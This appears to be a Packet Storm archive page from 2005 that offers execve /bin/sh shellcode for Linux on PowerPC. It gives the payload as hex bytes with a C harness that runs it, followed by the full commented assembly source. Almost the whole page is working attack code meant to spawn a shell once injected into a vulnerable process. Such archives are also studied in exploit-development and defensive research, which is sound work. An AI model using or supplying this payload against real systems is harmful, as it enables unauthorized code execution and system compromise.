Twenty Year Anniversary

execve-core.c

execve-core.c
Posted Nov 8, 2005
Authored by Charles Stevenson | Site bokeoa.com

execve /bin/sh shellcode for Linux PPC. execve-core.s is appended.

tags | shellcode, ppc
systems | linux
MD5 | b2c9cbc7bceadb4103caa67834b2d856

execve-core.c

Change Mirror Download
/* execve-core.c by Charles Stevenson <core@bokeoa.com> */
char hellcode[] = /* execve /bin/sh linux/ppc by core */
// Sometimes you can comment out the next line if space is needed
"\x7c\x3f\x0b\x78" /*mr r31,r1*/
"\x7c\xa5\x2a\x79" /*xor. r5,r5,r5*/
"\x42\x40\xff\xf9" /*bdzl+ 10000454<main>*/
"\x7f\x08\x02\xa6" /*mflr r24*/
"\x3b\x18\x01\x34" /*addi r24,r24,308*/
"\x98\xb8\xfe\xfb" /*stb r5,-261(r24)*/
"\x38\x78\xfe\xf4" /*addi r3,r24,-268*/
"\x90\x61\xff\xf8" /*stw r3,-8(r1)*/
"\x38\x81\xff\xf8" /*addi r4,r1,-8*/
"\x90\xa1\xff\xfc" /*stw r5,-4(r1)*/
"\x3b\xc0\x01\x60" /*li r30,352*/
"\x7f\xc0\x2e\x70" /*srawi r0,r30,5*/
"\x44\xde\xad\xf2" /*.long 0x44deadf2*/
"/bin/shZ"; // the last byte becomes NULL

int main(void)
{
void (*shell)() = (void *)&hellcode;
printf("%d byte execve /bin/sh shellcode for linux/ppc by core\n",
strlen(hellcode));
shell();
return 0;
}

#;;; PowerPC Linux Execve /bin/sh Shellcode
#;;;
#;;; by Charles 'core' Stevenson <core@bokeoa.com>
#;;;
#;;; Greetz: lamagra, palante, ghandi, d0tslash, and LSD for their
#;;; significant research without which none of this would be possible.
#;;;
#;;; Fsck: drow for never sharing his shellcode. Security through
#;;; obscurity never lasts forever man what did you expect? :)
#;;;
#;;; Note: Since this code is self modifying it'll crash if you just
#;;; compile the .s and run it directly. ;-) Copy somewhere writable
#;;; or run within gdb
#;;;
#;;; Last Updated: Wed Feb 16 20:14:43 MST 2005

.globl main
main:
#;; Save the stack pointer!!!!!!!!!!!!!!!!!!!!!!!!
#;; This critical step cost me HOURS upon hours in gdb stepping
#;; through one instruction at a time! :/ Somtimes you can omit
#;mr %r31, %r1

#;;; execve("/bin/sh",["/bin/sh",NULL],NULL);
#;; GPR5 = 0 and CR = 0
#;; NOTE: xor != xor. (dot means update CR)
#;; *** THANKS GHANDI!!! ***
xor. %r5, %r5, %r5

#;; branch if counter is zero and store the address in
#;; link register (counter is 0 since we just loaded it;)
bdzl main

#;; move the address of main to GPR24
mflr %r24

#;; get offset to /bin/sh
addi %r24, %r24, 268 + 40

#;; add null to end of string
stb %r5, -261(%r24)

#;; store pointer to /bin/sh
subi %r3, %r24, 268
stw %r3, -8(%r1)

#;; r4 = argument pointer
subi %r4, %r1, 8

#;; push environment pointer
stw %r5, -4(%r1)

#;; syscall(__NR_execve)
li %r30, 11*32
srawi %r0, %r30, 5
.long 0x44deadf2 #;sc

#;; /xxx/xxZ do not remove the Z!
.ascii "/bin/shZ"

#;;; EOF

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    26 Files
  • 2
    Oct 2nd
    15 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    15 Files
  • 6
    Oct 6th
    2 Files
  • 7
    Oct 7th
    3 Files
  • 8
    Oct 8th
    23 Files
  • 9
    Oct 9th
    16 Files
  • 10
    Oct 10th
    15 Files
  • 11
    Oct 11th
    19 Files
  • 12
    Oct 12th
    16 Files
  • 13
    Oct 13th
    2 Files
  • 14
    Oct 14th
    2 Files
  • 15
    Oct 15th
    15 Files
  • 16
    Oct 16th
    20 Files
  • 17
    Oct 17th
    19 Files
  • 18
    Oct 18th
    21 Files
  • 19
    Oct 19th
    16 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    19 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close